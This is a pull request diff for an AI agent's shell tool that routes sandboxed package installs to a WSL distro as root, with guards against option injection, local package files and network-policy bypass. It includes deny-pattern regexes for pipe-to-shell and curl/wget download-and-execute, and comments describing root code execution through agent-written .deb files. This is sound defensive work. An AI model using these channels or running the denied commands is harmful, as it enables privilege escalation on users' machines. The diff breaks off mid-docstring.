### PR TITLE
fix(sandbox): 系统包安装路由到 WSL 发行版以 root 执行（#759）

### DIFF
--- a/docs/developer-guide.md
+++ b/docs/developer-guide.md
@@ -189,11 +189,14 @@ apps/desktop/src/
 > 以 root 执行（`wsl.exe -d <distro> -u root`），一次安装，跨会话可用。
 >
 > 路由只接受单一安装命令（含 `-y`/`--non-interactive` 等安全选项，及
-> `pkg:arch`、`pkg=ver`、`pkg/rel` 形式的包名）；`dist-upgrade`/
-> `full-upgrade`、本地 `.deb` 安装（任何路径形态的包名——沙箱内的
-> agent 不能以 root 执行其自产文件）、绝对路径、自定义选项
+> `pkg:arch`、`pkg=ver` 形式的包名）；`dist-upgrade`/
+> `full-upgrade`、本地包文件安装（任何含 `/` 的包名——多段相对路径
+> `pkgs/x.deb` 同样拒绝，沙箱内的 agent 不能以 root 执行其自产文件；
+> `.deb`/`.rpm`/`.apk` 等包文件后缀也拒绝）、绝对路径、自定义选项
 > （`-o`/`--config` 等）与复合命令会被安全护栏拦截。沙箱被显式禁用
-> （`enabled: false`）时不参与路由。
+> （`enabled: false`）时不参与路由；沙箱策略禁止网络访问（BLOCK_ALL）
+> 时安装也会被拦截（安装必须联网下载包）。长安装（如 texlive）期间
+> 会周期性发送进度事件，避免回合被空闲超时误判为失败。
 
 ## 代码规范
 

--- a/docs/developer-guide.md
+++ b/docs/developer-guide.md
@@ -161,6 +161,7 @@ apps/desktop/src/
     "sandbox": {
       "enabled": true,
       "share_net": false,
+      "allow_system_installs": false,
       "max_sandboxes": 10,
       "auto_cleanup": true,
       "wsl_distro": "AIShadowSandbox",
@@ -175,11 +176,24 @@ apps/desktop/src/
 |------|------|--------|------|
 | `enabled` | bool | true | 启用沙箱隔离 |
 | `share_net` | bool | false | 共享宿主机网络（true=容器可联网） |
+| `allow_system_installs` | bool | false | 将系统包安装命令（`sudo apt-get install ...` 等）路由到 WSL 发行版以 root 执行。沙箱内无 root 且 `/usr` 等系统目录只读，apt 永远无法在沙箱内安装；开启后安装命令会改为在 WSL 发行版中执行，**安装一次、跨会话持久**，并立即通过沙箱对发行版系统目录的 ro-bind 在沙箱内可见（如 `xelatex`）。默认关闭：在 WSL 发行版中执行 root 命令属于主动让渡的权限，需用户显式开启。仅 Windows + WSL 生效（#759） |
 | `max_sandboxes` | int | 10 | 最大并发沙箱数 |
 | `auto_cleanup` | bool | true | 会话结束时自动清理沙箱 |
 | `wsl_distro` | str | "AIShadowSandbox" | WSL 发行版名称 |
 | `sandbox_distro_name` | str | "AIShadowSandbox" | 专用沙箱发行版（优先级高于 wsl_distro） |
 | `wsl_base_dir` | str | "/tmp/miqi-sandboxes" | WSL 内沙箱根目录 |
+
+> **重型工具链（LaTeX 等）安装**：需要 xelatex/编译器这类系统级工具时，
+> 在 `allow_system_installs: true` 下直接让 agent 执行
+> `sudo apt-get install -y texlive-xetex` 即可——命令会被路由到 WSL 发行版
+> 以 root 执行（`wsl.exe -d <distro> -u root`），一次安装，跨会话可用。
+>
+> 路由只接受单一安装命令（含 `-y`/`--non-interactive` 等安全选项，及
+> `pkg:arch`、`pkg=ver`、`pkg/rel` 形式的包名）；`dist-upgrade`/
+> `full-upgrade`、本地 `.deb` 安装（任何路径形态的包名——沙箱内的
+> agent 不能以 root 执行其自产文件）、绝对路径、自定义选项
+> （`-o`/`--config` 等）与复合命令会被安全护栏拦截。沙箱被显式禁用
+> （`enabled: false`）时不参与路由。
 
 ## 代码规范
 

--- a/miqi/agent/tools/shell.py
+++ b/miqi/agent/tools/shell.py
@@ -64,6 +64,14 @@ _PKG_INSTALL_RE = re.compile(
 #: friends take minutes to fetch, far beyond the exec tool's default 60 s.
 _SYSTEM_INSTALL_TIMEOUT = 1200.0  # seconds (20 min)
 
+#: Progress-heartbeat interval for long routed installs.  The chat drain
+#: idle timeout in the bridge is 600 s and the install budget is 1200 s,
+#: so without periodic events a texlive-scale install would end the turn
+#: with a TIMEOUT error while the root install kept running (CodeRabbit
+#: #820).  One tiny delta every 30 s keeps the turn alive for the full
+#: budget without flooding the frontend with dpkg output.
+_INSTALL_PROGRESS_INTERVAL_SECONDS = 30.0
+
 #: Tolerated prefix of a routed command: "yes |", "sudo", and leading flag
 #: clusters ("sudo -n", "sudo --preserve-env").  Everything after the
 #: prefix is normalized (see :meth:`ExecTool._normalize_system_install`):
@@ -183,6 +191,19 @@ _SYSTEM_INSTALL_NO_SANDBOX_MSG = (
     "Error: 系统包安装命令被拦截——当前没有可用的 bwrap 沙箱"
     "（沙箱创建/启动失败或未激活），无法路由到 WSL 发行版以 root 执行。"
     "安装命令未执行。请先确认沙箱环境正常后重试。"
+)
+
+#: Interception message when the policy engine selected a network-blocked
+#: execution for this command.  A distro-side install MUST download
+#: packages; routing it would fetch as root against the policy's explicit
+#: fail-closed choice, so the routing refuses instead (CodeRabbit #820).
+#: Currently defensive — the policy engine only emits BLOCK_ALL for
+#: RESTRICTED selections, which the routing never overrides — but the
+#: routed path must never become the weaker path if that changes.
+_SYSTEM_INSTALL_NO_NETWORK_MSG = (
+    "Error: 系统包安装命令被拦截——当前沙箱策略禁止网络访问"
+    "（NetworkSandboxPolicy.BLOCK_ALL），而安装必须在 WSL 发行版中"
+    "联网下载软件包。请在权限配置中允许网络后重试。"
 )
 
 
@@ -334,6 +355,9 @@ class ExecTool(Tool):
                 sandbox_selection=_sandbox,
                 session_key=_session_key,
                 cancel_event=cancel_event,
+                event_emitter=event_emitter,
+                turn_id=turn_id,
+                tool_call_id=tool_call_id,
             )
             if routed_result is not None:
                 return routed_result
@@ -1417,9 +1441,12 @@ class ExecTool(Tool):
         elif re.match(r"^zypper\s+\S+", cmd, re.IGNORECASE) and not re.search(
             r"(^|\s)-n(\s|$)|--non-interactive", cmd
         ):
+            # --non-interactive is a GLOBAL zypper option and must precede
+            # the command (zypper --non-interactive install ...), per SUSE
+            # docs; placed after the verb it may be ignored (CodeRabbit #820).
             cmd = re.sub(
                 r"^(zypper)(\s+\S+)",
-                lambda mo: f"{mo.group(1)}{mo.group(2)} --non-interactive",
+                r"\1 --non-interactive\2",
                 cmd,
                 count=1,
                 flags=re.IGNORECASE,
@@ -1455,15 +1482,18 @@ class ExecTool(Tool):
           allowlisted package manager option is the only thing that may
           reach the distro run (security review #759 F1);
         * a package token must match :data:`_PKG_TOKEN_RE` — package specs
-          only (names, ``pkg:arch``, ``pkg=ver``, ``pkg/rel``), no shell
-          metacharacters and nothing starting with ``-`` (treated as a
-          flag); any path-like token (``/x``, ``./x.deb``, ``../x``,
-          ``~/x``, ``~user/x``) is REFUSED — a relative .deb would make the
-          distro's root apt execute maintainer scripts from a workspace
-          file the agent wrote (arbitrary root code execution, review #759
-          P1), and ``/etc/passwd``-style tokens would trip the desktop
-          approval system's ``/etc/`` patterns for nothing (review #759
-          N5).  ``~`` survives only after ``=`` (version pin
+          only (names, ``pkg:arch``, ``pkg=ver``), no shell metacharacters
+          and nothing starting with ``-`` (treated as a flag); ANY token
+          containing ``/`` is REFUSED — a relative multi-segment token
+          (``pkgs/evil.deb``) would make the distro's root apt execute
+          maintainer scripts from a workspace file the agent wrote
+          (arbitrary root code execution, review #759 P1 + CodeRabbit
+          #820; the ``pkg/rel`` repo-qualifier form is dropped with it —
+          it cannot be reliably distinguished from a path), and
+          ``/etc/passwd``-style tokens would trip the desktop approval
+          system's ``/etc/`` patterns for nothing (review #759 N5).
+          Package file suffixes (``.deb``/``.rpm``/...) are refused even
+          without a slash.  ``~`` survives only after ``=`` (version pin
           ``pkg=1.0~rc1``); the absence of metacharacters is what makes
           the rebuilt command injection-safe inside ``bash -c``.
         """
@@ -1497,18 +1527,26 @@ class ExecTool(Tool):
             if not _PKG_TOKEN_RE.match(tok):
                 return None  # shell metacharacters
             if (
-                tok.startswith("/")
-                or tok.startswith(("./", "../", "~/"))
+                "/" in tok
                 or (tok.startswith("~") and "=" not in tok)
+                or tok.lower().endswith(
+                    (".deb", ".rpm", ".apk",
+                     ".pkg.tar.zst", ".pkg.tar.xz", ".pkg.tar.gz", ".pkg.tar")
+                )
             ):
-                # Path-like tokens are refused outright.  A relative .deb
-                # ("./x.deb") would have the distro's ROOT apt execute its
-                # maintainer scripts — and the file could be one the agent
-                # wrote into the sandbox workspace (the workspace is a bind
-                # of the distro filesystem): arbitrary root code execution,
-                # the same channel as the -o/-c option injection (review
-                # #759 P1).  "~" is only legal after "=" (version pin
-                # "pkg=1.0~rc1"); "~/x" and "~user/x" are shell expansions.
+                # Path-like tokens are refused outright.  ANY slash is
+                # refused — not just leading ./ ../ — because a relative
+                # multi-segment token ("pkgs/evil.deb", "sessions/k/…/evil.deb")
+                # would let the agent's own workspace file reach the
+                # distro's ROOT apt, which executes .deb maintainer scripts
+                # (arbitrary root code execution, same channel as the -o/-c
+                # option injection and review #759 P1).  This also drops
+                # the pkg/rel repo-qualifier form — it cannot be reliably
+                # distinguished from a path and is rarely needed.  Package
+                # file suffixes (.deb/.rpm/...) are refused even without a
+                # slash.  "~" is only legal after "=" (version pin
+                # "pkg=1.0~rc1"); "~x" / "~/x" are shell expansions.
+                # (review #759 P1 + CodeRabbit #820)
                 return None
             if manager != "pacman" and not verb_seen:
                 if tok not in verbs:
@@ -1578,6 +1616,9 @@ class ExecTool(Tool):
         sandbox_selection,
         session_key: str | None,
         cancel_event: asyncio.Event | None = None,
+        event_emitter=None,
+        turn_id: str = "",
+        tool_call_id: str = "",
     ) -> _ExecResult | None:
         """Route system package installs to the WSL distro as root (#759).
 
@@ -1589,29 +1630,36 @@ class ExecTool(Tool):
         1. Only when a bwrap sandbox context is active (never overrides an
            orchestrator's explicit NONE/RESTRICTED selection).
         2. Only for install-family commands (see :meth:`_is_system_install_command`).
-        3. A disabled sandbox manager (user chose direct host exec) → the
+        3. Network policy: a selection that blocks network access
+           (BLOCK_ALL) refuses the routing — a distro-side install must
+           download packages, and it must not fetch as root against the
+           policy's fail-closed choice (CodeRabbit #820).  Currently
+           defensive (the policy engine only emits BLOCK_ALL for
+           RESTRICTED selections, which step 1 already excludes) but the
+           routed path must never become the weaker path.
+        4. A disabled sandbox manager (user chose direct host exec) → the
            routing never participates, not even to intercept (review #759
            O2).
-        4. ``allow_system_installs`` off → intercept with an actionable
+        5. ``allow_system_installs`` off → intercept with an actionable
            message, BEFORE any sandbox resolution or approval: the command
            is dead on arrival, no sandbox should be created for it, and the
            message must point at the real fix (enable the option), not at
            the sandbox (review #759 O1).
-        5. Desktop approval (when ``approval_callback`` is wired) runs here
+        6. Desktop approval (when ``approval_callback`` is wired) runs here
            too — routed commands do NOT bypass the approval system; the
            user can decline, which intercepts before any sandbox is
            resolved or any root command is spawned.
-        6. A live bwrap sandbox must resolve — when none is available the
+        7. A live bwrap sandbox must resolve — when none is available the
            command is intercepted with a clear message instead of falling
            through to the normal path's Windows-cmd degradation (review
            #759 N2).
-        7. WSL-only — native Linux sandboxes get a WSL-only message.
-        8. Deny-pattern re-check (minus sudo), allow_patterns, dist-upgrade
+        8. WSL-only — native Linux sandboxes get a WSL-only message.
+        9. Deny-pattern re-check (minus sudo), allow_patterns, dist-upgrade
            refusal, and single-command normalization (see
            :meth:`_guard_system_install_command`) — dangerous, option-
            carrying or system-rewriting commands are refused.
-        9. Cancel check, then the normalized command is executed as root in
-           the WSL distro.
+        10. Cancel check, then the normalized command is executed as root in
+            the WSL distro.
         """
         if self._sandbox_manager is None:
             return None
@@ -1622,6 +1670,15 @@ class ExecTool(Tool):
             and sandbox_selection.sandbox_type != SandboxType.BWRAP
         ):
             return None
+        if (
+            sandbox_selection is not None
+            and sandbox_selection.network_policy == NetworkSandboxPolicy.BLOCK_ALL
+        ):
+            # Fail closed: the selected policy forbids network access, and
+            # a distro-side install must download packages — fetching as
+            # root against that choice would make the routed path weaker
+            # than the restricted path it replaced (CodeRabbit #820).
+            return _ExecResult(output=_SYSTEM_INSTALL_NO_NETWORK_MSG, exit_code=1)
 
         # O2: sandbox disabled (enabled=False) means direct host exec was
         # chosen — neither routing nor intercepting installs is wanted; the
@@ -1684,10 +1741,18 @@ class ExecTool(Tool):
                 exit_code=-1, cancelled=True,
             )
 
-        return await self._execute_system_install(sandbox, normalized)
+        return await self._execute_system_install(
+            sandbox, normalized,
+            event_emitter=event_emitter, turn_id=turn_id,
+            tool_call_id=tool_call_id,
+        )
 
     async def _execute_system_install(
         self, sandbox, command: str,
+        *,
+        event_emitter=None,
+        turn_id: str = "",
+        tool_call_id: str = "",
     ) -> _ExecResult:
         """Run a normalized install command as root in the WSL distro (#759).
 
@@ -1698,19 +1763,46 @@ class ExecTool(Tool):
         --noconfirm) is injected so the root run never hangs on a TTY
         prompt.
 
-        The result is buffered (no streaming) with a dedicated long timeout;
-        texlive-scale installs can emit tens of MB of progress text (dpkg
-        per-package lines, ``\\r`` progress bars pass through verbatim), so
-        the peak is bounded by that output size, and the agent sees nothing
-        until the run finishes.  A cancelled install can leave the
-        distro-side run finishing in the background — acceptable, since the
-        install is idempotent and lands in the persistent distro either way.
+        The result is buffered (no streaming) with a dedicated long
+        timeout; texlive-scale installs can emit tens of MB of progress
+        text (dpkg per-package lines, ``\\r`` progress bars pass through
+        verbatim), so the accumulated output is tail-bounded by the sandbox
+        layer and the agent sees nothing until the run finishes.  During
+        the run a progress delta is emitted roughly every
+        :data:`_INSTALL_PROGRESS_INTERVAL_SECONDS` so the bridge's chat
+        drain idle timeout (600 s) does not end a long install's turn as a
+        TIMEOUT while the root install continues in the distro (CodeRabbit
+        #820).  A cancelled install can leave the distro-side run finishing
+        in the background — acceptable, since the install is idempotent and
+        lands in the persistent distro either way.
         """
         install_cmd = self._inject_noninteractive_flags(command)
 
         start = time.monotonic()
+        last_progress = 0.0
+
+        async def _progress(text: str, stream_name: str) -> None:
+            """Throttled heartbeat: one tiny delta per interval keeps the
+            turn alive without flooding the frontend with dpkg output."""
+            nonlocal last_progress
+            if event_emitter is None:
+                return
+            now = time.monotonic()
+            if now - last_progress < _INSTALL_PROGRESS_INTERVAL_SECONDS:
+                return
+            last_progress = now
+            await event_emitter.emit(ExecCommandOutputDeltaEvent(
+                turn_id=turn_id,
+                tool_call_id=tool_call_id,
+                stream=stream_name,
+                delta=(
+                    f"[system install] 安装进行中（已运行 "
+                    f"{int(now - start)}s）……\n"
+                ),
+            ))
+
         rc, out, err = await sandbox.run_in_distro_root(
-            install_cmd, timeout=_SYSTEM_INSTALL_TIMEOUT,
+            install_cmd, timeout=_SYSTEM_INSTALL_TIMEOUT, on_output=_progress,
         )
         duration_ms = int((time.monotonic() - start) * 1000)
 

--- a/miqi/agent/tools/shell.py
+++ b/miqi/agent/tools/shell.py
@@ -36,6 +36,156 @@ class _ExecResult:
     sandbox_type: str = "none"
 
 
+# ── System package install routing (#759) ──────────────────────────────
+
+#: Install-family commands eligible for routing to the WSL distro as root.
+#: The bwrap sandbox is unprivileged (uid 1000) against read-only system
+#: dirs, so apt-get can never install inside it.  The WSL distro the
+#: sandbox ro-binds /usr, /lib, ... from IS the persistent root-capable
+#: layer: installing there once makes the toolchain visible in every
+#: sandbox session.  Only the install/update family matches — remove/purge
+#: and any command that merely contains "apt-get" are NOT auto-routed.
+#: Leading "yes |" / "sudo" / flag clusters (e.g. "sudo -n", "apt-get -y")
+#: are tolerated because the distro run is already root.
+_PKG_INSTALL_RE = re.compile(
+    r"^(?:yes\s*\|\s*)?(?:sudo\s+)?(?:-{1,2}[^\s]+\s+)*(?:"
+    r"apt-get\s+(?:-{1,2}[^\s]+\s+)*(?:update|upgrade|dist-upgrade|full-upgrade|install|reinstall)"
+    r"|apt\s+(?:-{1,2}[^\s]+\s+)*(?:update|upgrade|dist-upgrade|full-upgrade|install|reinstall)"
+    r"|dnf\s+(?:-{1,2}[^\s]+\s+)*(?:update|upgrade|install|reinstall)"
+    r"|yum\s+(?:-{1,2}[^\s]+\s+)*(?:update|upgrade|install|reinstall)"
+    r"|zypper\s+(?:-{1,2}[^\s]+\s+)*(?:update|upgrade|install)"
+    r"|apk\s+(?:-{1,2}[^\s]+\s+)*(?:update|upgrade|add)"
+    r"|pacman\s+-(?:S(?:yu|yy|y|u)?)"
+    r")\b",
+    re.IGNORECASE,
+)
+
+#: Routed installs run with their own generous timeout — texlive-xetex and
+#: friends take minutes to fetch, far beyond the exec tool's default 60 s.
+_SYSTEM_INSTALL_TIMEOUT = 1200.0  # seconds (20 min)
+
+#: Tolerated prefix of a routed command: "yes |", "sudo", and leading flag
+#: clusters ("sudo -n", "sudo --preserve-env").  Everything after the
+#: prefix is normalized (see :meth:`ExecTool._normalize_system_install`):
+#: only a bare install command with allowlisted flags survives.
+_SYSTEM_INSTALL_PREFIX_RE = re.compile(
+    r"^(?:yes\s*\|\s*)?(?:sudo\s+)?(?:-{1,2}[^\s]+\s+)*"
+)
+
+#: A package token may contain only these characters (package names, arch
+#: qualifiers "pkg:amd64", version pins "pkg=1.2", repo qualifiers "pkg/rel").
+#: No shell metacharacters.  Tokens starting with "-" are treated as flags
+#: (rejected unless allowlisted); path-like tokens ("./x.deb", "~/x", "/x",
+#: ...) are rejected separately in _normalize_system_install — a relative
+#: .deb would execute the agent's own file as root via the manager's
+#: maintainer scripts (review #759 P1).
+_PKG_TOKEN_RE = re.compile(r"^[a-zA-Z0-9+._~:=/-]+$")
+
+#: Flags a routed install may carry into the root distro run, per manager.
+#: Everything else — apt -o/-c (Dir::Bin::dpkg, APT::Update::Pre-Invoke),
+#: dnf --config/--installroot/--pluginconfpath, pacman --config/--hookdir,
+#: zypper --root, and any "--flag=value" form — REFUSES the routing: the
+#: distro run happens as root, so an option whose VALUE is a path can
+#: execute arbitrary files as root via the manager's hooks/plugins/binaries
+#: (security review #759 F1).  Values that merely tweak prompts/verbosity/
+#: recommends are fine.
+_SYSTEM_INSTALL_SAFE_FLAGS: dict[str, frozenset[str]] = {
+    "apt-get": frozenset({
+        "-y", "--assume-yes", "-n", "--no-install-recommends",
+        "--no-install-suggests", "-q", "-qq", "--quiet", "--print-uris",
+        "-f", "--fix-broken", "--only-upgrade", "-u",
+    }),
+    "apt": frozenset({
+        "-y", "--assume-yes", "-n", "--no-install-recommends",
+        "--no-install-suggests", "-q", "-qq", "--quiet", "--print-uris",
+        "-f", "--fix-broken", "--only-upgrade", "-u",
+    }),
+    "dnf": frozenset({
+        "-y", "--assume-yes", "-q", "--quiet", "--print-uris", "--nobest",
+        "--skip-broken",
+    }),
+    "yum": frozenset({"-y", "--assume-yes", "-q", "--quiet", "--skip-broken"}),
+    "zypper": frozenset({
+        "-y", "-n", "--non-interactive", "-q", "--quiet", "--no-recommends",
+    }),
+    "apk": frozenset({"--no-cache", "-q", "--quiet", "--no-progress"}),
+    "pacman": frozenset({
+        "--noconfirm", "--needed", "-q", "--quiet", "--print", "-p",
+        "--asdeps", "--asexplicit",
+    }),
+}
+
+#: Verb sets per manager (mirrors _PKG_INSTALL_RE's install/update family).
+#: ``dist-upgrade``/``full-upgrade`` are deliberately absent: they remove
+#: packages and rewrite the whole system (kernel, conflicting packages) as
+#: root on the REAL distro — a blast radius far beyond "install a toolchain",
+#: and it would smuggle remove capability in through the back door (review
+#: #759 N1).  They still classify as install-family (see _PKG_INSTALL_RE) so
+#: they reach the routing chain and get a specific refusal message instead
+#: of falling through to a confusing in-sandbox failure.
+_SYSTEM_INSTALL_VERBS: dict[str, tuple[str, ...]] = {
+    "apt-get": ("update", "upgrade", "install", "reinstall"),
+    "apt": ("update", "upgrade", "install", "reinstall"),
+    "dnf": ("update", "upgrade", "install", "reinstall"),
+    "yum": ("update", "upgrade", "install", "reinstall"),
+    "zypper": ("update", "upgrade", "install"),
+    "apk": ("update", "upgrade", "add"),
+}
+
+#: Interception message when install commands are attempted but
+#: tools.sandbox.allow_system_installs is disabled — explains the real
+#: path instead of the generic guard rejection.
+_SYSTEM_INSTALL_NOT_ENABLED_MSG = (
+    "Error: 系统包安装命令被拦截——沙箱内无 root 权限且系统目录只读，"
+    "apt-get 无法在沙箱内安装。\n"
+    "请让用户在配置中开启 tools.sandbox.allow_system_installs 后重试："
+    "开启后 sudo apt-get install ... 会自动以 root 在 WSL 发行版中执行，"
+    "安装一次跨会话持久，装完即可在沙箱内使用。"
+)
+
+#: Interception message when system installs are enabled but the sandbox
+#: runs on native Linux (no rootful WSL distro layer to install into).
+_SYSTEM_INSTALL_WSL_ONLY_MSG = (
+    "Error: 系统包安装仅支持 Windows + WSL 环境（需要 rootful 的 WSL 发行版，"
+    "沙箱系统目录从该发行版 ro-bind）。当前沙箱运行在原生 Linux 上，"
+    "无法路由系统安装；请改用用户级安装（如 pip install --user、"
+    "工具链源码本地构建），或让用户在 Windows + WSL 环境下使用此功能。"
+)
+
+#: Interception message when a routed command is not a single, option-safe
+#: install command: shell compounds (&&/;/|/redirects/...) and un-allowlisted
+#: package-manager options (apt -o/-c, dnf --config/--installroot, pacman
+#: --config/--hookdir, zypper --root, ...) are refused — the command would
+#: run as root on the REAL distro filesystem.
+_SYSTEM_INSTALL_SINGLE_MSG = (
+    "Error: 命令被安全护栏拦截（系统安装路由只接受单一安装命令："
+    "包管理器 + 操作 + 包名，仅允许 -y/--non-interactive 等安全选项，"
+    "不允许复合命令或自定义选项）——安装命令会以 root 在 WSL 发行版中"
+    "执行，不允许附加其他 shell 操作。"
+)
+
+#: Interception message for apt dist-upgrade/full-upgrade — they remove
+#: packages and rewrite the whole distro (kernel, conflicts) as root, a
+#: blast radius far beyond installing a toolchain (review #759 N1).
+_SYSTEM_INSTALL_DISTUPGRADE_MSG = (
+    "Error: 命令被安全护栏拦截——dist-upgrade/full-upgrade 会以 root 在"
+    "WSL 发行版中移除/替换系统包（含内核），破坏面远超安装工具链，"
+    "不在系统安装路由的允许范围内。允许的操作：update、upgrade、install、"
+    "reinstall（以及各包管理器的对应安装家族动词）。"
+)
+
+#: Interception message when the routing chain cannot resolve a live
+#: bwrap sandbox to attach the install to — previously this silently fell
+#: through to the normal path, where a missing sandbox degrades to running
+#: the command in Windows cmd ("sudo is not recognized") despite the exec
+#: environment telling the agent installs are routed (review #759 N2).
+_SYSTEM_INSTALL_NO_SANDBOX_MSG = (
+    "Error: 系统包安装命令被拦截——当前没有可用的 bwrap 沙箱"
+    "（沙箱创建/启动失败或未激活），无法路由到 WSL 发行版以 root 执行。"
+    "安装命令未执行。请先确认沙箱环境正常后重试。"
+)
+
+
 class ExecTool(Tool):
     """Tool to execute shell commands, optionally inside a bwrap sandbox."""
 
@@ -70,6 +220,14 @@ class ExecTool(Tool):
             r"\$\([^)\n]{1,500}\)",  # $() command substitution
             r"\|\s*(ba|da|z|fi|c)?sh\b",  # pipe to any shell variant
             r"\b(?:curl|wget)\b[^;\n]{0,200}\|\s*python[23]?\b",  # download-and-execute via Python
+        ]
+        # System-install routing (#759) runs the command as root in the WSL
+        # distro, so it re-checks the deny patterns EXCEPT sudo — the
+        # routed command legitimately starts with sudo/apt-get.  Any other
+        # dangerous pattern (rm -rf, disk ops, pipe-to-shell, ...) refuses
+        # the routing instead of letting it run as root.
+        self._deny_patterns_without_sudo = [
+            p for p in self.deny_patterns if "sudo" not in p
         ]
         self.allow_patterns = allow_patterns or []
         self.restrict_to_workspace = restrict_to_workspace
@@ -164,6 +322,22 @@ class ExecTool(Tool):
         # Phase 31.5: exec end event needs a single exit point.
         # _ExecResult carries output + metadata so the end event is accurate.
         async def _run() -> _ExecResult:
+            # Phase 77 (#759): system package install routing.  The bwrap
+            # sandbox cannot install system packages (unprivileged uid,
+            # read-only /usr /var /etc), so install-family commands are
+            # routed to the WSL distro as root when the user enabled
+            # tools.sandbox.allow_system_installs — or intercepted with a
+            # clear explanation when not.  Returns a result (handled) or
+            # None (proceed with normal execution below).
+            routed_result = await self._maybe_route_system_install(
+                command,
+                sandbox_selection=_sandbox,
+                session_key=_session_key,
+                cancel_event=cancel_event,
+            )
+            if routed_result is not None:
+                return routed_result
+
             # If desktop approval callback is wired in, use the full
             # approval system.  Otherwise fall back to the static guard.
             if self.approval_callback is not None:
@@ -1208,6 +1382,372 @@ class ExecTool(Tool):
             or (not _sensitive.search(k) and not k.startswith(_sensitive_prefixes))
         }
 
+    # ── System package install routing (#759) ──────────────────────────
+
+    @staticmethod
+    def _is_system_install_command(command: str) -> bool:
+        """True when the command is an install/update-family package command.
+
+        Matches the anchored install-family regex (tolerating leading
+        ``yes |`` / ``sudo`` / short-flag prefixes).  Commands that merely
+        contain "apt-get" elsewhere (e.g. ``echo apt-get install``) are not
+        matches — only commands STARTING with the package manager.
+        """
+        return bool(_PKG_INSTALL_RE.match(command.strip()))
+
+    @staticmethod
+    def _inject_noninteractive_flags(command: str) -> str:
+        """Inject non-interactive flags when absent so the root distro run
+        never hangs on a TTY prompt: -y for apt/apt-get/dnf/yum,
+        --non-interactive for zypper (-y is not a zypper option),
+        --noconfirm for pacman.  The verb must be the first token (sudo /
+        leading flags are already stripped by the caller).
+        """
+        cmd = command
+        if re.match(r"^(apt-get|apt|dnf|yum)\s+\S+", cmd, re.IGNORECASE) and not re.search(
+            r"(^|\s)-y(\s|$)", cmd
+        ):
+            cmd = re.sub(
+                r"^(apt-get|apt|dnf|yum)(\s+\S+)",
+                lambda mo: f"{mo.group(1)}{mo.group(2)} -y",
+                cmd,
+                count=1,
+                flags=re.IGNORECASE,
+            )
+        elif re.match(r"^zypper\s+\S+", cmd, re.IGNORECASE) and not re.search(
+            r"(^|\s)-n(\s|$)|--non-interactive", cmd
+        ):
+            cmd = re.sub(
+                r"^(zypper)(\s+\S+)",
+                lambda mo: f"{mo.group(1)}{mo.group(2)} --non-interactive",
+                cmd,
+                count=1,
+                flags=re.IGNORECASE,
+            )
+        elif re.match(r"^pacman\s+-\S+", cmd, re.IGNORECASE) and "--noconfirm" not in cmd:
+            cmd = re.sub(
+                r"^(pacman\s+-\S+)",
+                r"\1 --noconfirm",
+                cmd,
+                count=1,
+                flags=re.IGNORECASE,
+            )
+        return cmd
+
+    @staticmethod
+    def _normalize_system_install(command: str) -> str | None:
+        """Reduce a routed install command to its safe canonical form.
+
+        Returns the canonical ``manager verb [flags] [packages...]`` string
+        (safe to embed in ``bash -c``), or ``None`` when the command is not
+        a single option-safe install command.
+
+        The tolerated prefix (``yes |`` / ``sudo`` / leading flags) is
+        stripped, then every remaining token is walked:
+
+        * the verb must be an install/update-family verb for the manager
+          (pacman's ``-S`` family is its own verb, exactly once);
+        * a flag must be in :data:`_SYSTEM_INSTALL_SAFE_FLAGS` for that
+          manager — apt ``-o``/``-c``, dnf ``--config``/``--installroot``,
+          pacman ``--config``/``--hookdir``, zypper ``--root`` and any
+          ``--flag=value`` form are REFUSED: their value is a path the
+          manager executes as root (hooks/plugins/binaries), so an
+          allowlisted package manager option is the only thing that may
+          reach the distro run (security review #759 F1);
+        * a package token must match :data:`_PKG_TOKEN_RE` — package specs
+          only (names, ``pkg:arch``, ``pkg=ver``, ``pkg/rel``), no shell
+          metacharacters and nothing starting with ``-`` (treated as a
+          flag); any path-like token (``/x``, ``./x.deb``, ``../x``,
+          ``~/x``, ``~user/x``) is REFUSED — a relative .deb would make the
+          distro's root apt execute maintainer scripts from a workspace
+          file the agent wrote (arbitrary root code execution, review #759
+          P1), and ``/etc/passwd``-style tokens would trip the desktop
+          approval system's ``/etc/`` patterns for nothing (review #759
+          N5).  ``~`` survives only after ``=`` (version pin
+          ``pkg=1.0~rc1``); the absence of metacharacters is what makes
+          the rebuilt command injection-safe inside ``bash -c``.
+        """
+        text = command.strip()
+        prefix = _SYSTEM_INSTALL_PREFIX_RE.match(text)
+        rest = text[prefix.end():].strip()
+        if not rest:
+            return None
+        head = rest.split(None, 1)
+        manager = head[0].lower()
+        safe = _SYSTEM_INSTALL_SAFE_FLAGS.get(manager)
+        if safe is None:
+            return None
+        verbs = _SYSTEM_INSTALL_VERBS.get(manager)
+        tokens = head[1].split() if len(head) > 1 else []
+
+        verb_seen = False
+        normalized: list[str] = [manager]
+        for tok in tokens:
+            if tok.startswith("-"):
+                if manager == "pacman" and re.match(r"^-S(?:yu|yy|y|u)?$", tok):
+                    if verb_seen:
+                        return None  # only one -S family operation
+                    verb_seen = True
+                    normalized.append(tok)
+                    continue
+                if tok not in safe:
+                    return None
+                normalized.append(tok)
+                continue
+            if not _PKG_TOKEN_RE.match(tok):
+                return None  # shell metacharacters
+            if (
+                tok.startswith("/")
+                or tok.startswith(("./", "../", "~/"))
+                or (tok.startswith("~") and "=" not in tok)
+            ):
+                # Path-like tokens are refused outright.  A relative .deb
+                # ("./x.deb") would have the distro's ROOT apt execute its
+                # maintainer scripts — and the file could be one the agent
+                # wrote into the sandbox workspace (the workspace is a bind
+                # of the distro filesystem): arbitrary root code execution,
+                # the same channel as the -o/-c option injection (review
+                # #759 P1).  "~" is only legal after "=" (version pin
+                # "pkg=1.0~rc1"); "~/x" and "~user/x" are shell expansions.
+                return None
+            if manager != "pacman" and not verb_seen:
+                if tok not in verbs:
+                    return None
+                verb_seen = True
+            normalized.append(tok)
+        if not verb_seen:
+            return None
+        return " ".join(normalized)
+
+    def _guard_system_install_command(self, command: str) -> str | None:
+        """Safety guard for commands that would run as root in the WSL distro.
+
+        Layers, in order:
+        1. The same deny patterns as :meth:`_guard_command`, minus the sudo
+           pattern (the routed command legitimately starts with sudo).  Any
+           OTHER dangerous pattern (rm -rf, disk ops, pipe-to-shell, command
+           substitution, ...) refuses the routing outright.
+        2. ``allow_patterns`` (if configured) applies here too — an explicit
+           allowlist must match the command, same as the normal guard.
+        3. Single-command normalization: the tolerated prefix (yes | / sudo
+           / leading flags) is stripped, then the command must reduce to a
+           bare ``manager verb packages`` command with allowlisted flags
+           only.  Shell compounds and any option whose value could redirect
+           execution (apt -o/-c, dnf --config/--installroot, pacman
+           --config/--hookdir, ...) are refused (see
